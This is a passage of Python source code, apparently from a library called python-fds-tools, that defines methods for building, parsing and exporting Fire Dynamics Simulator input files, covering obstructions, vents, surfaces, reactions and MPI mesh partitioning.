"""Adds mpi processes to meshes stored in internal attributes
Adds mpi processes to meshes stored in internal attributes.
Can be used to automatically split meshes to balance load on
mpi processes.
Parameters
----------
numberOfProcesses : int
Number of mpi processes
allowMeshSplitting : bool
Flag specifying whether meshes can be split
splitMultiplier : float
Threshold used in splitting meshes
meshSplitAxes : list of booleans
Specifies along which axes the software is allowed to split
meshes.
"""
meshes, numCells = self.calculateMeshCells()
cellsPerProcess = np.sum(numCells)/numberOfProcesses
mpiConverged = False
splitConverged = False
assumedConverged = False
while not mpiConverged and not assumedConverged:
mpiConverged = True
while not splitConverged and allowMeshSplitting:
splitConverged = True
meshes, numCells = self.calculateMeshCells()
for mesh, numCell in zip(meshes, numCells):
if numCell > cellsPerProcess*splitMultiplier:
self.splitMESHonce(self.meshes[mesh], meshSplitAxes)
splitConverged = False
meshes, numCells = self.calculateMeshCells()
#print(len(meshes), numberOfProcesses)
if len(meshes) / 10 > numberOfProcesses:
print("Warning: Number of meshes 10x greater than number of requested processes (%0.0f, %0.0f)"%(len(meshes), numberOfProcesses))
print("AssumingConvergence")
assumedConverged = True
mpiProcessInds = np.zeros((len(numCells),))-1
mpiProcess = np.zeros((numberOfProcesses,))
while np.argwhere(mpiProcessInds == -1).shape[0] > 0:
ind = np.argmax(numCells)
ind2 = np.argmin(mpiProcess)
mpiProcessInds[ind] = ind2
mpiProcess[ind2] += numCells[ind]
numCells[ind] = 0
if np.max(mpiProcess) > cellsPerProcess*splitMultiplier and allowMeshSplitting:
mpiConverged = False
splitConverged = False
splitMultiplier = splitMultiplier*0.9
for key, mp in zip(meshes, mpiProcessInds):
self.meshes[key]['MPI_PROCESS'] = mp
self.mpiProcesses = numberOfProcesses
self.meshOrder = np.argsort(mpiProcessInds)
def addOBST(self, ID, XB, SURF_IDS=None, SURF_ID=None,
SURF_ID6=None, BNDF_OBST=True, THICKEN=None,
TRANSPARENCY=None, COLOR=None):
"""Adds an obst key to internal attribute obsts
Adds an obst key to internal attribute obsts. Optional
parameters that are specified as None will not be explicitly
specified in a generated input file. These values at runtime
will default to current FDS default parameters.
Parameters
----------
ID : str
String identifier for the obstruction
XB : float array(6)
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
SURF_IDS : str array(3), optional
Three component array specifying surface definition
(default None)
SURF_ID : str, optional
String specifing surface for all faces
SURF_ID6 : str array(6), optional
Six component array specifying surface definition for
X-, X+, Y-, Y+, Z-, Z+ (default None)
BNDF_OBST : bool
Flag specifying if boundary data is to be output for all
faces of this obstruction (default True)
THICKEN : bool
Flag specifying if obstruction is to be thickened to be at
least one grid cell thick (default None)
TRANSPARENCY : float
Value specifying how transparent this obstruction should be
in visualization (default None)
COLOR : str
String specifiying a color for the obstruction
"""
obst = defaultdict(bool)
obst['XB'] = XB
obst['ID'] = ID
if SURF_IDS != None: obst['SURF_IDS'] = SURF_IDS
if SURF_ID != None: obst['SURF_ID'] = SURF_ID
if SURF_ID6 != None: obst['SURF_ID6'] = SURF_ID6
if BNDF_OBST: obst['BNDF_OBST'] = True
if THICKEN != None: obst['THICKEN'] = THICKEN
if TRANSPARENCY != None: obst['TRANSPARENCY'] = TRANSPARENCY
if COLOR != None: obst['COLOR'] = COLOR
if self.obsts[ID]:
counter = self.obsts[ID]['counter']
counter += 1
self.obsts["%s-%0.0f"%(ID, counter)] = obst
self.obsts[ID]['counter'] = counter
else:
obst['counter'] = 0
self.obsts[ID] = obst
def addPRES(self, VELOCITY_TOLERANCE=None,
MAX_PRESSURE_ITERATIONS=None):
"""Adds a pres key to internal attribute pres
Adds a pres key to internal attribute pres. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
VELOCITY_TOLERANCE : float
Value for the velocity error tolerance
MAX_PRESSURE_ITERATIONS : int
Maxmium number of iterations allowed in the pressure solver
"""
pres = defaultdict(bool)
if VELOCITY_TOLERANCE != None:
pres['VELOCITY_TOLERANCE'] = VELOCITY_TOLERANCE
if MAX_PRESSURE_ITERATIONS != None:
pres['MAX_PRESSURE_ITERATIONS'] = MAX_PRESSURE_ITERATIONS
self.pres['ID'] = pres
def addRAMP(self, ID, T, F, appendZero=False, appendTime=1.0):
"""Adds a ramp key to internal attribute ramps
Adds a ramp key to internal attribute ramps.
Parameters
----------
ID : str
String identifier for the obstruction
T : float array(N)
Array specifying the x-axis of the ramp
F : float array(N)
Array specifying the y-axis of the ramp
"""
if type(T) == pd.core.frame.DataFrame: T = T.values
if type(T) == pd.core.series.Series: T = T.values
if type(T) == np.ndarray: T = list(T)
if type(F) == pd.core.frame.DataFrame: F = F.values
if type(F) == pd.core.series.Series: F = F.values
if type(F) == np.ndarray: F = list(F)
if appendZero:
T.append(T[-1] + appendTime)
F.append(0)
if self.ramps[ID]:
Ts = self.ramps[ID]['T']
Fs = self.ramps[ID]['F']
for t, f in zip(T, F):
Ts.append(t)
Fs.append(f)
self.ramps[ID]['T'] = Ts
self.ramps[ID]['F'] = Fs
else:
self.ramps[ID] = defaultdict(bool)
self.ramps[ID]['T'] = T
self.ramps[ID]['F'] = F
self.ramps[ID]['ID'] = ID
def addREAC(self, ID, FUEL=None, FORMULA=None, AIT=None, SY=None,
COY=None, HOC=None,
C=None, H=None, O=None, N=None, FYI=None, RF=None):
"""Adds a reac key to internal attribute reacs
Adds a reac key to internal attribute reacs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the reaction
FUEL : str, optional
String name of the fuel in the reaction (default None)
FORMULA : str, optional
String formula of the reaction (default None)
AIT : float, optional
Float auto ignition temperature of the reaction
(default None)
SY : float, optional
Float soot yield of the reaction (default None)
COY : float, optional
Float carbon monoxide yield of the reaction (default None)
HOC : float, optional
Float heat of combustion of the reaction (default None)
C : float, optional
Float number of carbon atoms in the chemical formula of the
reaction (default None)
H : float, optional
Float number of hydrogen atoms in the chemical formula of
the reaction (default None)
O : float, optional
Float number of oxygen atoms in the chemical formula of the
reaction (default None)
N : float, optional
Float number of nitrogen atoms in the chemical formula of
the reaction (default None)
FYI : string, optional
String containing comment field to be included in input file
RF : float, optional
Float radiative fraction of the reaction (default None)
"""
reac = defaultdict(bool)
reac['ID'] = ID
if FUEL != None: reac['FUEL'] = FUEL
if FORMULA != None: reac['FORMULA'] = FORMULA
if AIT != None: reac['AUTO_IGNITION_TEMPERATURE'] = AIT
if SY != None: reac['SOOT_YIELD'] = SY
if COY != None: reac['CO_YIELD'] = COY
if HOC != None: reac['HEAT_OF_COMBUSTION'] = HOC
if C != None: reac['C'] = C
if H != None: reac['H'] = H
if O != None: reac['O'] = O
if N != None: reac['N'] = N
if FYI != None: reac['FYI'] = FYI
if RF != None: reac['RADIATIVE_FRACTION'] = RF
self.reacs[ID] = reac
def addSLCF(self, QUANTITY, PBX=None, PBY=None, PBZ=None,
Vec=False, XB=None, SPEC_ID=None, CELL_CENTERED=None):
"""Adds a slcf key to internal attribute slcfs
Adds a slcf key to internal attribute slcfs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
QUANTITY : str
Quantity of the slice
PBX : float, optional
Value along x-axis of the plane (default None)
PBY : float, optional
Value along y-axis of the plane (default None)
PBZ : float, optional
Value along z-axis of the plane (default None)
Vec : bool, optional
Flag specifying if the slice is a vector slice
(default False)
XB : float array(6), optional
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
SPEC_ID : str, optional
String specifying the species of the slice
CELL_CENTERED : bool, optional
Boolean specifying whether the quantity is cell centered
"""
slcf = defaultdict(bool)
slcf['ID'] = "SLCF-%05.0f"%(self.slcfs['unknownCounter'])
slcf['QUANTITY'] = QUANTITY
if PBX != None: slcf['PBX'] = PBX
if PBY != None: slcf['PBY'] = PBY
if PBZ != None: slcf['PBZ'] = PBZ
if SPEC_ID != None: slcf['SPEC_ID'] = SPEC_ID
if Vec: slcf['VECTOR'] = 'TRUE'
if XB != None:
if type(XB) is list: XB = np.array(XB)
slcf['XB'] = XB
if CELL_CENTERED != None: slcf['CELL_CENTERED'] = CELL_CENTERED
self.slcfs['unknownCounter'] += 1
self.slcfs[slcf['ID']] = slcf
def addSURF(self, ID, Mid=None, Col=None, Thi=None, Bac=None,
Geo=None, Fyi=None, Len=None, LeaPat=None, Hrrpua=None,
qramp=None, Rgb=None, adiabatic=False, VOLUME_FLOW=None,
VEL_T=None):
"""Adds a surf key to internal attribute surfs
Adds a surf key to internal attribute surfs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the surface
Mid : str array(N), optional
Array of material IDs in the surface (default None)
Col : str, optional
String specifying the color of the surface (default None)
Thi : float array(N), optional
Array of floats specifying the thickness of each material
in the surface (default None)
Bac : str, optional
String specifying the type of back boundary condition
(default None)
Geo : str, optional
String specifying the type of geometry to use for the
surface (default None)
Fyi : str, optional
String containing comment field to be included in input file
Len : float, optional
Value of length to be used in heat transfer calculation
(default None)
LeaPat : array(2), optional
Array specifying leak path for the surface
HRRPUA : float, optional
Value of heat release rate per unit area of the surface
(default None)
qramp : str, optional
String identifier of ramp for the heat release rate per unit
area (default None)
Rgb : float array(3), optional
Array specifying the color of the surface (default None)
adiabatic : bool, optional
Flag specifying if the surface is adiabatic (default False)
VOLUME_FLOW : float, optional
Value of specified volume flow from the surface
(default None)
VEL_T : float, optional
Value of specified tangential velocity from the surface
(default None)
"""
surf = defaultdict(bool)
surf['ID'] = ID
if Mid != None: surf['MATL_ID'] = Mid
if Col != None: surf['COLOR'] = Col
if Thi != None: surf['THICKNESS'] = Thi
if Bac != None: surf['BACKING'] = Bac
if Geo != None: surf['GEOMETRY'] = Geo
if Fyi != None: surf['FYI'] = Fyi
if Len != None: surf['LENGTH'] = Len
if LeaPat != None: surf['LEAK_PATH'] = LeaPat
if Hrrpua != None: surf['HRRPUA'] = Hrrpua
if qramp != None: surf['RAMP_Q'] = qramp
if Rgb != None: surf['RGB'] = Rgb
if adiabatic: surf['ADIABATIC'] = True
if VOLUME_FLOW != None: surf['VOLUME_FLOW'] = VOLUME_FLOW
if VEL_T != None: surf['VEL_T'] = VEL_T
self.surfs[ID] = surf
def addTIME(self, T_END=0.0, T_BEGIN=0.0):
"""Adds a time key to internal attribute time
Adds a time key to internal attribute time. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
T_END : float, optional
Time to end the simulation (default None)
T_BEGIN : float, optional
Time to begin the simulation (default None)
"""
time = defaultdict(bool)
time['T_BEGIN'] = T_BEGIN
time['T_END'] = T_END
self.time['ID'] = time
def addVENT(self, ID, SURF_ID, XB=None, CTRL_ID=None, MB=None,
IOR=None):
"""Adds a vent key to internal attribute vents
Adds a vent key to internal attribute vents. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the vent
SURF_ID : str
String identifier specifying the surface of the vent
XB : float array(6), optional
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates (default None)
CTRL_ID : str, optional
String identifier for control determining if the vent is
active (default None)
MB : str, optional
String specifying short-hand position of axis (default None)
IOR : int, optional
Integer specifying the orientation of the vent
(default None)
"""
vent = defaultdict(bool)
vent['ID'] = ID
vent['SURF_ID'] = SURF_ID
if XB is not None:
if type(XB) is list: XB = np.array(XB)
vent['XB'] = XB
if CTRL_ID != None: vent['CTRL_ID'] = CTRL_ID
if MB != None: vent['MB'] = MB
if IOR != None: vent['IOR'] = IOR
if self.vents[ID]:
counter = self.vents[ID]['counter']
counter += 1
self.vents["%s-%0.0f"%(ID, counter)] = vent
self.vents[ID]['counter'] = counter
else:
vent['counter'] = 0
self.vents[ID] = vent
def addZONE(self, ID, XB, LEAK_AREA=None):
"""Adds a zone key to internal attribute zones
Adds a zone key to internal attribute zones. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the zone
XB : float array(6)
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates (default None)
LEAK_AREA : float array(N), optional
Leakage area to each pressure zone
"""
zone = defaultdict(bool)
zone['ID'] = ID
zone['XB'] = XB
if LEAK_AREA != None: zone['LEAK_AREA'] = LEAK_AREA
self.zones[ID] = zone
def calculateMeshCells(self):
"""Returns a list of mesh keys and number of cells in each mesh
Returns
-------
list
List of mesh keys
list
List of number of cells
"""
meshes = []
numCells = []
meshKeys = list(self.meshes.keys())
try:
meshKeys.remove('unknownCounter')
except:
pass
for key in meshKeys:
IJK = self.meshes[key]['IJK']
numCells.append(IJK[0]*IJK[1]*IJK[2])
meshes.append(key)
return meshes, numCells
def checkOverlappingMESH(self):
"""Returns True if any meshes are overlapping else False
Returns
-------
bool
True if any meshes are overlapping, else False
"""
def in_hull(p,hull):
if not isinstance(hull,scsp.Delaunay):
hull = scsp.Delaunay(hull)
return hull.find_simplex(p)>=0
def pointsFromXB(XB,extend=[0.05, -0.05, 0.05, -0.05, 0, 0]):
pts = [[XB[0]+extend[0],XB[2]+extend[2],XB[4]+extend[4]],
[XB[0]+extend[0],XB[2]+extend[2],XB[5]+extend[5]],
[XB[0]+extend[0],XB[3]+extend[3],XB[4]+extend[4]],
[XB[0]+extend[0],XB[3]+extend[3],XB[5]+extend[5]],
[XB[1]+extend[1],XB[2]+extend[2],XB[4]+extend[4]],
[XB[1]+extend[1],XB[2]+extend[2],XB[5]+extend[5]],
[XB[1]+extend[1],XB[3]+extend[3],XB[4]+extend[4]],
[XB[1]+extend[1],XB[3]+extend[3],XB[5]+extend[5]]]
return pts
meshHulls = defaultdict(bool)
for key in list(self.meshes.keys()):
pts = pointsFromXB(self.meshes[key]['XB'])
meshHull = scsp.Delaunay(pts)
meshHulls[key] = meshHull
overlap = False
for key1 in list(self.meshes.keys()):
for key2 in list(self.meshes.keys()):
if (key1 != key2):
extend = [0.05, -0.05, 0.05, -0.05, 0, 0]
if ('east' in key2): extend = [0.05, 0.1, 0.05, -0.05, 0, 0]
if ('west' in key2): extend = [-0.1, -0.05, 0.05, -0.05, 0, 0]
if ('north' in key2): extend = [0.05, -0.05, 0.05, 0.1, 0, 0]
if ('south' in key2): extend = [0.05, -0.05, -0.1, -0.05, 0, 0]
pts = pointsFromXB(self.meshes[key2]['XB'], extend=extend)
for p in pts:
if in_hull(p, meshHulls[key1]):
overlap = True
return overlap
def dictFromLine(self, line, lineType, types):
"""Returns a dictionary with keys and values from a namelist
Parameters
----------
line : str
String namelist line
lineType : str
String type of namelist
types : dict
Dictionary containing dictionaries of namelist key types
Returns
-------
defaultdict
Dictionary containing keys from the namelist line
"""
lineDict = defaultdict(bool)
keys = self.splitLineIntoKeys(line)
for key in keys:
keyID, keyID2, keyType, keyValue = self.interpretKey(key, lineType, types)
#print(keyID, keyID2, keyType, keyValue)
if keyType == 'string':
keyValue = keyValue.split("'")[1]
elif keyType == 'float':
keyValue = float(keyValue.replace(' ', '').replace(',','').replace('/',''))
elif keyType == 'int':
keyValue = int(keyValue.replace(' ', '').replace(',','').replace('/',''))
elif keyType == 'bool':
keyValue = keyValue.split(".")[1]
elif ('list' in keyType) and ('ind' not in keyType) and ('row' not in keyType):
vals = []
while (keyValue[-1] == ' ') or (keyValue[-1] == ',') or (keyValue[-1] == '/'):
keyValue = keyValue[:-1]
keyValues = keyValue.split(",")
for t in keyValues:
if 'string' in keyType: preprocess = t.split("'")[1]
if 'float' in keyType: preprocess = float(t.replace(' ', '').replace(',','').replace('/',''))
if 'int' in keyType: preprocess = int(t.replace(' ', '').replace(',','').replace('/',''))
vals.append(preprocess)
keyValue = vals
elif ('list' in keyType) and ('ind' in keyType) and ('row' not in keyType):
#print(keyID, keyID2, keyType, keyValue)
regex1 = r"(\(.{0,3}):(.{0,3}\))"
while (keyValue[-1] == ' ') or (keyValue[-1] == ',') or (keyValue[-1] == '/'):
keyValue = keyValue[:-1]
keyValues = keyValue.split(",")
if 'string' in keyType: keyValues = [x.split("'")[1] for x in keyValues]
if 'float' in keyType: keyValues = [float(x) for x in keyValues]
if 'int' in keyType: keyValues = [int(x) for x in keyValues]
tmp = re.search(regex1, keyID)
if tmp is not None:
ar1 = [int(x) for x in tmp.groups()[0].replace('(','').split(':')]
ar2 = [int(x) for x in tmp.groups()[1].replace(')','').split(':')]
else:
(ar1, ar2) = ([1], [len(keyValues)])
tmp = np.zeros((np.max([ar1, ar2]), 1), dtype='object')
for i in range(0, tmp.shape[0]):
tmp[i-1, 0] = keyValues[i-1]
keyValue = tmp
elif ('list' in keyType) and ('ind' not in keyType) and ('row' in keyType):
vals = []
while (keyValue[-1] == ' ') or (keyValue[-1] == ',') or (keyValue[-1] == '/'):
keyValue = keyValue[:-1]
keyValues = keyValue.split(",")
for t in keyValues:
if 'string' in keyType: preprocess = t
if 'float' in keyType: preprocess = float(t.replace(' ', '').replace(',','').replace('/',''))
if 'int' in keyType: preprocess = int(t.replace(' ', '').replace(',','').replace('/',''))
vals.append(preprocess)
keyValue = vals
elif ('matrix' in keyType):
#print(keyID, keyID2, keyType, keyValue)
regex1 = r"(\(.{0,3});(.{0,3}\))"
while (keyValue[-1] == ' ') or (keyValue[-1] == ',') or (keyValue[-1] == '/'):
keyValue = keyValue[:-1]
keyValues = keyValue.split(",")
if 'string' in keyType: keyValues = [x.split("'")[1] for x in keyValues]
if 'float' in keyType: keyValues = [float(x) for x in keyValues]
tmp = re.search(regex1, keyID)
if tmp is not None:
ar1 = [int(x) for x in tmp.groups()[0].replace('(','').split(':')]
ar2 = [int(x) for x in tmp.groups()[1].replace(')','').split(':')]
if len(ar1) == 1: ar1 = [ar1[0], ar1[0]]
if len(ar2) == 1: ar2 = [ar2[0], ar2[0]]
else:
(ar1, ar2) = ([1, 1], [1, len(keyValues)])
tmp = np.zeros((np.max(ar1), np.max(ar2)), dtype='object')
counter = 0
if ar1[0] == ar1[1]:
ar1 = np.array(np.zeros((len(keyValues),)) + ar1[0], dtype=np.int32)
else:
ar1 = list(range(ar1[0], ar1[1]+1))
if ar2[0] == ar2[1]:
ar2 = np.array(np.zeros((len(keyValues),)) + ar2[0], dtype=np.int32)
else:
ar2 = list(range(ar2[0], ar2[1]+1))
for counter in range(0, len(keyValues)):
i = ar1[counter]
j = ar2[counter]
tmp[i-1, j-1] = keyValues[counter]
counter += 1
keyValue = tmp
else:
print(lineType.lower(), keyID, keyID2, keyType)
print(len(keyID))
print(line)
print(keys)
assert False, "Stopped"
lineDict[keyID2] = keyValue
return lineDict
def dictMerge(self, template, master, path=None):
"""Merges two dictionaries
This function merges two dictionaries into a single dictionary.
The template dictionary is used as the baseline, and master is
merged into template. Entries in master will overwrite entries
in template. Note, nested dictionaries will be merged using the
same procedure.
Parameters
----------
template : dict or defaultdict
Baseline dictionary
master : dict or defaultdict
Master dictionary. Entries in template will be overwritten
by entries in master.
path : str
Internal variable storing path to current key.
Used in recursive calls for nested dictionaries.
Returns
-------
dict or defaultdict
Merged dictionary
"""
if path is None: path = []
for key in master:
if key in template:
tCheck = isinstance(template[key], dict)
mCheck = isinstance(master[key], dict)
if tCheck and mCheck:
self.dictMerge(template[key], master[key], path + [str(key)])
elif template[key] == master[key]:
pass
else:
template[key] = master[key]
else:
template[key] = master[key]
return template
def generateFDStext(self, newlines=None, fields=None):
"""Returns str of input file
This function generates the fds input file based on the stored
attribute dictionaries. The optional input parameters provide
customization in how the input file is exported. Providing
a value of None will produce the default configuration.
Parameters
----------
newlines : defaultdict, optional
Dictionary containing boolean for each field type. If True,
each key from the namelist will be placed on a new line.
If False, each key will be placed on the same line.
(default None)
fields : list, optional
List containing the order namelists will be exported to
the input file. (default None)
Returns
-------
str
text of input file
"""
date = datetime.date.today()
(year, month, day) = (date.year, date.month, date.day)
dateStr = "%04.0f-%02.0f-%02.0f"%(year, month, day)
intro = "Input file generated with python-fds-tools v1"
types = fdsLineTypes(version=self.version)
if newlines is None: newlines = self.getNewlineFromTypes()
if fields is None: fields = self.getDefaultFields()
if self.meshOrder is False: self.addMPIprocesses(1)
text = "%s\n"%("!"*72)
text = "%s%s %s on %s%s%s\n"%(
text, "!"*5, intro, dateStr, " "*2, "!"*5)
text = "%s%s\n"%(text, "!"*72)
for field in fields:
key = self.keyFromLineType(field)
keyN = "&%s"%(field)
keyT = getattr(types, field.lower())
keyD = getattr(self, key)
if key == 'meshes':
txt = self.makeMESH(keyD, keyT, order=self.meshOrder)
elif key == 'ramps':
txt = self.makeRAMP(keyD)
else:
newline1 = newlines[key]
newline2 = keyD['newline']
newline = (newline1 or newline2)
txt = self.makeLinesFromDict(keyD, keyT, keyN, newline)
text = "%s%s"%(text, txt)
for line in self.customLines:
text = "%s%s\n"%(text, line)
return text
def getDefaultFields(self):
"""Returns default field order
Returns
-------
list
List of default field order
"""
fields = ["HEAD", "TIME", "MISC", "WIND", "INIT", "DUMP", "ZONE",
"PRES", "MESH", "REAC", "RADI", "MATL", "SURF",
"RAMP", "OBST", "HOLE", "VENT", "PART", "DEVC",
"CTRL", "BNDF", "SLCF", "PROP", "SPEC", "PROF"]
return fields
def getLineType(self, line):
"""Returns namelist key from str line
This function extracts the namelist key from a string line
Parameters
----------
line : str
String containing the fortran namelist line
Returns
-------
str
String containing fortran namelist type
"""
lineType = line[:4]
return lineType
def getMeshLimits(self):
"""Returns a dictionary containing the extents of defined meshes
This function returns a dictionary containing a key 'XB' with an
array of the total extents defined in meshes.
Returns
-------
dict
Nested dictionary containing 'Overall'->'XB'->float array(6)
"""
meshLimits = defaultdict(bool)
limitingXB = [100000, -100000, 100000, -100000, 100000, -100000]
for key in list(self.meshes.keys()):
mesh = self.meshes[key]
XB = mesh['XB']
limitingXB[0] = min([limitingXB[0], XB[0]])
limitingXB[1] = max([limitingXB[1], XB[1]])
limitingXB[2] = min([limitingXB[2], XB[2]])
limitingXB[3] = max([limitingXB[3], XB[3]])
limitingXB[4] = min([limitingXB[4], XB[4]])
limitingXB[5] = max([limitingXB[5], XB[5]])
meshLimits[key] = mesh
meshLimits['Overall'] = defaultdict(bool)
meshLimits['Overall']['XB'] = limitingXB
return meshLimits
def getNewlineFromTypes(self):
"""Returns a dictionary containing default new line parameters
Returns
-------
dict
Dictionary containing default new line parameters
"""
newlines = defaultdict(bool)
newlines['HEAD'] = False
newlines['TIME'] = False
newlines['MISC'] = False
newlines['INIT'] = True
newlines['DUMP'] = False
newlines['ZONE'] = True
newlines['PRES'] = True
newlines['MESH'] = False
newlines['REAC'] = True
newlines['RADI'] = True
newlines['MATL'] = True
newlines['SURF'] = True
newlines['RAMP'] = False
newlines['OBST'] = False
newlines['HOLE'] = False
newlines['VENT'] = False
newlines['PART'] = False
newlines['DEVC'] = False
newlines['CTRL'] = False
newlines['BNDF'] = False
newlines['SLCF'] = False
newlines['PROP'] = False
newlines['SPEC'] = False
return newlines
def getPolygonNamesFromFdsFile(self):
"""Returns alist of polygons defined in the fds input file
This function returns a list of polygons defined in the fds
input file.
Returns
-------
list
List containing names of all obstructions which have
boundary data available.
"""
names = []
obstList = list(self.obsts.keys())
if 'unknownCounter' in obstList:
obstList.remove('unknownCounter')
for key in obstList:
if self.obsts[key]['BNDF_OBST']:
names.append(self.obsts[key]["ID"])
names = list(set(names))
return names
def importFile(self, file=None, text=None, textList=None):
"""Adds keys to each namelist from an input file, text, or list
This function will add keys to each namelist from an input file,
text, or text list.
Parameters
----------
file : str, optional
String containing path to input file
text : str, optional
String containing imported text from an input file
text : str, optional
List of strings containing individual namelist lines
"""
if file != None:
f = self.zopen(file)
textFDS = f.read()
textFDS = textFDS.decode("utf-8")
elif text != None:
textFDS = text
elif textList != None:
textFDS = '\n'.join(textList)
lines = self.makeFDSLines(textFDS)
self.parseFDSLines(lines)
def interpretKey(self, key, lineType, types):
"""Processes a key from a namelist key pair
This function processes a key from a namelist key pair to
return the keyID, keyType, and keyValue.
Parameters
----------
key : str
String containing namelist key pair
lineType : str
String containing namelist type
types : defaultdict
Dictionary containing types for each key in a namelist type
Returns
-------
str
raw keyID containing all text left of = sign
str
regex keyID searching for matrix values left of = sign
dict
dictionary containing key types for namelist
str
raw keyValue containing all text right of = sign
"""
keyID = key.split('=')[0].upper()
keyValue = '='.join(key.split('=')[1:])
regex1 = r"\(\s*.*\)"
regex2 = r""
try:
keyID2 = re.sub(regex1, regex2, keyID)
except:
keyID2 = keyID
#keyID = keyID.strip()
#keyID2 = keyID.strip()
keyID2 = keyID2.replace("\t","")
while keyID2[-1] == ' ':
keyID2 = keyID2[:-1]
while keyID2[0] == ' ':
keyID2 = keyID2[1:]
keyType = getattr(types, lineType.lower())[keyID2]
return keyID, keyID2, keyType, keyValue
def keyAssist(self, text, types, dic,
internalKeys=['counter'], newline=False):
"""Returns a namelist text line from dictionary inputs.
This function returns a namelist text line based on an input
dictionary and type dictionary.
Parameters
----------
text : str
String to which to append namelist fields
types : dict
Dictionary containing types for namelist fields
dic : dict
Dictionary containing namelist keys and values
internalKeys : list, optional
List containing internal software fields not to be exported
to the text line
newline : bool, optional
Flag specifying whether each key in the namelist is to be
entered on the same of different lines
Returns
-------
str
Updated text string
"""
keys = list(dic.keys())
keys.sort()
if 'ID' in keys:
keys.insert(0, keys.pop(keys.index('ID')))
if dic['ID'] is False: dic['ID'] = 'UNKNOWN'
for key in internalKeys:
if key in keys:
keys.remove(key)
for key2 in keys:
#print(key2)
if 'THICKNESS' in key2:
decimals = 8
else:
decimals = 4
if (types[key2] == 'ignore'):
pass
elif (types[key2] == 'string'):
if dic[key2] is not False:
text = "%s%s='%s', "%(text, key2, dic[key2])
elif (types[key2] == 'float'):
#print(key2, dic[key2])
if dic[key2] is not False:
text = "%s%s=%s, "%(text, key2, '{:.{prec}f}'.format(dic[key2], prec=decimals))
elif (types[key2] == 'int'):
if dic[key2] is not False:
text = "%s%s=%0.0f, "%(text, key2, dic[key2])
elif (types[key2] == 'bool'):
boolCheck = False
if (dic[key2] is True): boolCheck = True
if (dic[key2] == 'TRUE'): boolCheck = True
if (dic[key2] == '.TRUE.'): boolCheck = True
if boolCheck:
text = "%s%s=.TRUE., "%(text, key2)
else:
text = "%s%s=.FALSE., "%(text, key2)
elif ('listind' in types[key2]):
temp = np.array(dic[key2])
tempTxt = "%s(%0.0f:%0.0f)="%(
key2, 1, temp.shape[0])
if type(temp[0]) == np.float64: temp = [temp]
for t in temp:
for tt in t:
if ('string' in types[key2]):
tempTxt = "%s '%s',"%(tempTxt, tt)
if ('float' in types[key2]):
tempTxt = "%s %s,"%(tempTxt, '{:.{prec}f}'.format(tt, prec=decimals))
if ('int' in types[key2]):
tempTxt = "%s %0.0f,"%(tempTxt, tt)
text = "%s%s "%(text, tempTxt)
elif ('list' in types[key2]):
temp = dic[key2]
tempTxt = "%s="%(key2)
if temp is not False:
for t in temp:
if ('string' in types[key2]):
tempTxt = "%s '%s',"%(tempTxt, t)
if ('float' in types[key2]):
tempTxt = "%s %s,"%(tempTxt, '{:.{prec}f}'.format(t, prec=decimals))
if ('int' in types[key2]):
tempTxt = "%s %0.0f,"%(tempTxt, t)
text = "%s%s "%(text, tempTxt)
elif ('matrix' in types[key2]):
temp = np.array(dic[key2])
sz = temp.shape
if len(sz) == 1:
temp = np.reshape(temp, (temp.shape[0], 1))
sz = temp.shape
ar1 = "(%0.0f:%0.0f,%0.0f:%0.0f)"%(
1, sz[1], 1, sz[0])
tempTxt = "%s%s="%(key2, ar1)
for t in temp.flatten():
if ('string' in types[key2]):
tempTxt = "%s '%s',"%(tempTxt, t)
if ('float' in types[key2]):
tempTxt = "%s %s,"%(tempTxt, '{:.{prec}f}'.format(t, prec=decimals))
if ('int' in types[key2]):
tempTxt = "%s %0.0f,"%(tempTxt, float(t))
text = "%s%s "%(text, tempTxt)
else:
print(keys)
print(dic)
print(key2)
print(types[key2])
assert False, "Stopped"
if newline and (types[key2] != 'ignore'):
text = "%s\n "%(text)
#except:
# print(keys)
# print(dic)
# print(types[key2])
return text
def keyFromLineType(self, lineType):
"""Returns internal attribute name from namelist type
Parameters
----------
lineType : str
String containing namelist type
Returns
-------
str
String containing internal attribute name
"""
if lineType == 'HEAD': key = 'head'
if lineType == 'DEVC': key = 'devcs'
if lineType == 'INIT': key = 'inits'
if lineType == 'OBST': key = 'obsts'
if lineType == 'VENT': key = 'vents'
if lineType == 'SURF': key = 'surfs'
if lineType == 'RAMP': key = 'ramps'
if lineType == 'CTRL': key = 'ctrls'
if lineType == 'MESH': key = 'meshes'
if lineType == 'SLCF': key = 'slcfs'
if lineType == 'BNDF': key = 'bndfs'
if lineType == 'TIME': key = 'time'
if lineType == 'DUMP': key = 'dump'
if lineType == 'MISC': key = 'misc'
if lineType == 'ZONE': key = 'zones'
if lineType == 'REAC': key = 'reacs'
if lineType == 'MATL': key = 'matls'
if lineType == 'RADI': key = 'radis'
if lineType == 'PRES': key = 'pres'
if lineType == 'HOLE': key = 'holes'
if lineType == 'PART': key = 'parts'
if lineType == 'PROP': key = 'props'
if lineType == 'SPEC': key = 'specs'
if lineType == 'PROF': key = 'profs'
if lineType == 'WIND': key = 'winds'
return key
def makeFDSLines(self, textFDS):
"""Returns a list of namelist lines
This function cleans the input file, removing line breaks, and
splitting the text into lines based on namelist grouping.
Parameters
----------
textFDS : str
String containg text from an fds input file
Returns
-------
list
List of strings containing namelist lines
"""
linesFDS = [x for x in textFDS.split("&")[1:]]
for i in range(0, len(linesFDS)):
line2 = linesFDS[i]
line2 = '/'.join(line2.split('/')[:-1])
line2 = line2.replace('\r', ',')
line2 = line2.replace('\n', ',')
